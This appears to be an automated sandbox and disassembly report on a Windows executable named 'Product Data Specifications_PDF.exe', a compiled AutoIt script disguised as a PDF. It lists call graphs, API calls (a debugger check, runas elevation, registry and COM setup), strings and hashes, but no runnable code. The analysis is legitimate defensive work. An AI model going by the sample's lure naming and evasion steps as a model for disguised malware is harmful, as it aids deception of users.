40c877 89048->89049 89050 40bc70 52 API calls 89049->89050 89051 40c881 89050->89051 89052 40bc70 52 API calls 89051->89052 89053 40c88b 89052->89053 89054 40bc70 52 API calls 89053->89054 89055 40c8d1 89054->89055 89056 40bc70 52 API calls 89055->89056 89057 40c991 89056->89057 89080 40d2c0 52 API calls 89057->89080 89059 40c99b 89081 40d0d0 53 API calls 89059->89081 89061 40c9c1 89062 40bc70 52 API calls 89061->89062 89063 40c9cb 89062->89063 89082 40e310 53 API calls 89063->89082 89065 40ca28 89066 408f40 VariantClear 89065->89066 89067 40ca30 89066->89067 89068 408f40 VariantClear 89067->89068 89069 40ca38 GetStdHandle 89068->89069 89070 429630 89069->89070 89071 40ca87 89069->89071 89070->89071 89072 429639 89070->89072 89077 41130a 51 API calls __cinit 89071->89077 89083 4432c0 57 API calls 89072->89083 89074 429641 89084 44b6ab CreateThread 89074->89084 89076 42964f CloseHandle 89076->89071 89077->89042 89078->89045 89079->89047 89080->89059 89081->89061 89082->89065 89083->89074 89084->89076 89085 44b5cb 58 API calls 89084->89085 89086 425b6f 89091 40dc90 89086->89091 89090 425b7e 89092 40bc70 52 API calls 89091->89092 89093 40dd03 89092->89093 89100 40f210 89093->89100 89095 426a97 89097 40dd96 89097->89095 89098 40ddb7 89097->89098 89103 40dc00 52 API calls 2 library calls 89097->89103 89099 41130a 51 API calls __cinit 89098->89099 89099->89090 89104 40f250 RegOpenKeyExW 89100->89104 89102 40f230 89102->89097 89103->89097 89105 425e17 89104->89105 89106 40f275 RegQueryValueExW 89104->89106 89105->89102 89107 40f2c3 RegCloseKey 89106->89107 89108 40f298 89106->89108 89107->89102 89109 40f2a9 RegCloseKey 89108->89109 89110 425e1d 89108->89110 89109->89102

                              Executed Functions

                              Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                              Download Yara Rule
                              APIs
                              • _wcslen.LIBCMT ref: 004096C1
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • _memmove.LIBCMT ref: 0040970C
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                              • _memmove.LIBCMT ref: 00409D96
                              • _memmove.LIBCMT ref: 0040A6C4
                              • _memmove.LIBCMT ref: 004297E5
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                              • String ID:
                              • API String ID: 2383988440-0
                              • Opcode ID: 61c812ab78ec8123d4a89a7fe2278c57d0701dd771e1b89e3840c97f703fb0a2
                              • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                              • Opcode Fuzzy Hash: 61c812ab78ec8123d4a89a7fe2278c57d0701dd771e1b89e3840c97f703fb0a2
                              • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                              Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,00000104,?), ref: 00401F4C
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                              • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                              • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Product Data Specifications_PDF.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                              • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                              • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                              • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                              • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                              • String ID: C:\Users\user\Desktop\Product Data Specifications_PDF.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                              • API String ID: 2495805114-3439111204
                              • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                              • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                              • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                              • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                              Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1515 46cb5f-46cbc3 call 40bc70 * 3 call 408f40 1524 46cbd4-46cbe7 CLSIDFromProgID 1515->1524 1525 46cbc5-46cbcd OleInitialize 1515->1525 1526 46cc33-46cc47 1524->1526 1527 46cbe9-46cbf9 CLSIDFromString 1524->1527 1525->1524 1529 46cca6-46ccba call 458651 1526->1529 1530 46cc49-46cc60 CoCreateInstance 1526->1530 1527->1526 1528 46cbfb-46cc05 1527->1528 1533 46cc06-46cc30 call 451b42 call 402250 * 3 1528->1533 1531 46cc96-46cca1 1529->1531 1540 46ccbc-46ccf7 CoInitializeSecurity call 412f40 call 4311fc 1529->1540 1530->1531 1532 46cc62-46cc8b call 43119b 1530->1532 1531->1533 1548 46cc8e-46cc90 1532->1548 1551 46cdf4 1540->1551 1552 46ccfd-46cd1f call 402160 call 431a2b 1540->1552 1548->1531 1553 46ceb7-46cef0 call 468070 call 402250 * 3 1548->1553 1557 46cdfa-46ce4a call 412f40 CoCreateInstanceEx CoTaskMemFree 1551->1557 1567 46cd35-46cd41 call 465177 1552->1567 1568 46cd21-46cd33 1552->1568 1557->1531 1566 46ce50-46ce55 1557->1566 1566->1531 1570 46ce5b-46ce62 1566->1570 1579 46cd46-46cda3 call 40e0a0 call 402250 call 46150f call 40e0a0 call 402250 1567->1579 1571 46cda5-46cdaa 1568->1571 1574 46ce64-46ce8b CoSetProxyBlanket 1570->1574 1575 46ce8d-46ce9e 1570->1575 1577 46cdac-46cdbb call 4111c1 1571->1577 1578 46cdbd-46cdc0 1571->1578 1574->1575 1575->1548 1576 46cea4-46ceb2 1575->1576 1576->1533 1582 46cdc3-46cdf2 1577->1582 1578->1582 1579->1571 1582->1557
                              APIs
                              • OleInitialize.OLE32(00000000), ref: 0046CBC7
                              • CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF
                              • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                              • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                              • _wcslen.LIBCMT ref: 0046CDB0
                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                              • CoTaskMemFree.OLE32(?), ref: 0046CE42
                              • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                              Strings
                              • NULL Pointer assignment, xrefs: 0046CEA6
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                              • String ID: NULL Pointer assignment
                              • API String ID: 440038798-2785691316
                              • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                              • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                              • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                              • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                              Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1986 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1995 40e582-40e583 1986->1995 1996 427674-427679 1986->1996 1999 40e585-40e596 1995->1999 2000 40e5ba-40e5cb call 40ef60 1995->2000 1997 427683-427686 1996->1997 1998 42767b-427681 1996->1998 2002 427693-427696 1997->2002 2003 427688-427691 1997->2003 2001 4276b4-4276be 1998->2001 2004 427625-427629 1999->2004 2005 40e59c-40e59f 1999->2005 2013 40e5ec-40e60c 2000->2013 2014 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2000->2014 2015 4276c6-4276ca GetSystemInfo 2001->2015 2002->2001 2012 427698-4276a8 2002->2012 2003->2001 2008 427636-427640 2004->2008 2009 42762b-427631 2004->2009 2010 40e5a5-40e5ae 2005->2010 2011 427654-427657 2005->2011 2008->2000 2009->2000 2017 40e5b4 2010->2017 2018 427645-42764f 2010->2018 2011->2000 2016 42765d-42766f 2011->2016 2019 4276b0 2012->2019 2020 4276aa-4276ae 2012->2020 2022 40e612-40e623 call 40efd0 2013->2022 2023 4276d5-4276df GetSystemInfo 2013->2023 2014->2013 2029 40e5e8 2014->2029 2015->2023 2016->2000 2017->2000 2018->2000 2019->2001 2020->2001 2022->2015 2028 40e629-40e63f call 40ef90 GetNativeSystemInfo 2022->2028 2032 40e641-40e642 FreeLibrary 2028->2032 2033 40e644-40e651 2028->2033 2029->2013 2032->2033 2034 40e653-40e654 FreeLibrary 2033->2034 2035 40e656-40e65d 2033->2035 2034->2035
                              APIs
                              • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                              • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                              • FreeLibrary.KERNEL32(?), ref: 0040E642
                              • FreeLibrary.KERNEL32(?), ref: 0040E654
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                              • String ID: 0SH
                              • API String ID: 3363477735-851180471
                              • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                              • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                              • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                              • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                              Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: IsThemeActive$uxtheme.dll
                              • API String ID: 2574300362-3542929980
                              • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                              • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                              • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                              • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                              Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                              Download Yara Rule
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                              • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                              • TranslateMessage.USER32(?), ref: 00409556
                              • DispatchMessageW.USER32(?), ref: 00409561
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Message$Peek$DispatchSleepTranslate
                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                              • API String ID: 1762048999-758534266
                              • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                              • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                              • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                              • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                              Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,00000104,?), ref: 00401F4C
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • __wcsicoll.LIBCMT ref: 00402007
                              • __wcsicoll.LIBCMT ref: 0040201D
                              • __wcsicoll.LIBCMT ref: 00402033
                                • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                              • __wcsicoll.LIBCMT ref: 00402049
                              • _wcscpy.LIBCMT ref: 0040207C
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,00000104), ref: 00428B5B
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Product Data Specifications_PDF.exe$CMDLINE$CMDLINERAW
                              • API String ID: 3948761352-3700435339
                              • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                              • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                              • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                              • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                              Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __fread_nolock$_fseek_wcscpy
                              • String ID: D)E$D)E$FILE
                              • API String ID: 3888824918-361185794
                              • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                              • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                              • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                              • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                              Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                              • __wsplitpath.LIBCMT ref: 0040E41C
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • _wcsncat.LIBCMT ref: 0040E433
                              • __wmakepath.LIBCMT ref: 0040E44F
                                • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • _wcscpy.LIBCMT ref: 0040E487
                                • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                              • _wcscat.LIBCMT ref: 00427541
                              • _wcslen.LIBCMT ref: 00427551
                              • _wcslen.LIBCMT ref: 00427562
                              • _wcscat.LIBCMT ref: 0042757C
                              • _wcsncpy.LIBCMT ref: 004275BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                              • String ID: Include$\
                              • API String ID: 3173733714-3429789819
                              • Opcode ID: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                              • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                              • Opcode Fuzzy Hash: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                              • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                              Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • _fseek.LIBCMT ref: 0045292B
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                              • __fread_nolock.LIBCMT ref: 00452961
                              • __fread_nolock.LIBCMT ref: 00452971
                              • __fread_nolock.LIBCMT ref: 0045298A
                              • __fread_nolock.LIBCMT ref: 004529A5
